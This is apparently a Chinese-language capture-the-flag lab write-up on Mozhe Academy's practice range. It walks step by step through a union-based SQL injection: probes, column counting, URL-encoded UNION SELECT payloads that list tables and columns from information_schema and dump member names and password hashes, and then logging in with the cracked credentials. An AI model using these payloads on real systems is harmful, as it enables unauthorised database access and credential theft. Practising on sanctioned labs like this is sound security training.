0x00
我這邊是利用墨者學院的靶場來進行講解
靶場地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
SQL注入原理相關文章:https://www.cnblogs.com/lingyi888/p/12886483.html
0x01
開啟靶場我們可以看到登錄界面
0x02
我們來尋找一下注入點
利用工具啊D我們可以找到注入點
0x03
可以看到是這樣的界面
下面我們來進行檢測
我直接給出語句就不一步一步截圖了
檢測語句:
and 1=1 返回正常
and 1=2 返回錯誤
order by 4 得到有四個字段數
0x04
利用聯合查詢來查詢回顯位置
id=-1%20union%20select%201,2,3,4
判斷得到
可以知道回顯在 2 3這兩個字段
接下來,構造拼接語句進行查詢
使用回顯位爆出數據庫名和版本
id=-1%20union%20select%201,database(),version(),4
根據數據庫名爆破表名
id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema%20=%20%22mozhe_Discuz_StormGroup%22#
根據表名爆破列名
id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name%20=%20%22StormGroup_member%22%20#
爆列內容
id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member%20#
0x05
這邊可以看到存在兩個賬戶
密碼是md5解密一下就可以得到兩個賬號,其中一個登錄就可以
賬號一:
mozhe
dsan13
賬號二:
mozhe
451866
登錄就可以拿到flag了
ok,今天就到這里,關注我,一起學習哦